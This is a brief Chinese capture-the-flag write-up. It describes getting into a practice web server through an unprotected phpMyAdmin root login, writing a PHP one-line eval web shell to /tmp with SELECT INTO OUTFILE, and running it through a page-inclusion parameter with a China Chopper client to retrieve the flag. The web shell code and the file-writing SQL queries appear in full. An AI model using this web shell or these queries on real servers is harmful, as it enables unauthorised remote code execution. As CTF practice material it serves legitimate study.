dirbuster  扫目录   发现phpinfo()可以看到绝对路径   和  phpmyadmin

进入phpmyadmin页面   root直接空密码登录

查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话

load_file()可以读取任意文件

.......在经过各种尝试写人一句话再用文件包含读取的过程中.发现权限有各种限制。
.......因为page可以直接包含phpinfo()页面显示，所以以phpinfo()为测试，测试到/tmp 目录可以写入，也可以包含读取。
    于是将一句话写入/tmp，菜刀链接文件包含页面，得到flag


<?php eval(@$_POST['flag']); ?>

select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/lib/mysql/test1.php'  能写入，无法包含。
select "<?php eval(@$_POST['flag']); ?>"into outfile '/var/www/test1.php'  无法写入
............
...........
.......

 

select "<?php eval(@$_POST['flag']); ?>"into outfile '/tmp/test.php'  可以写入

http://111.198.29.45:36252/?page=/tmp/test.php 菜刀链接

 

 

 

 

 

....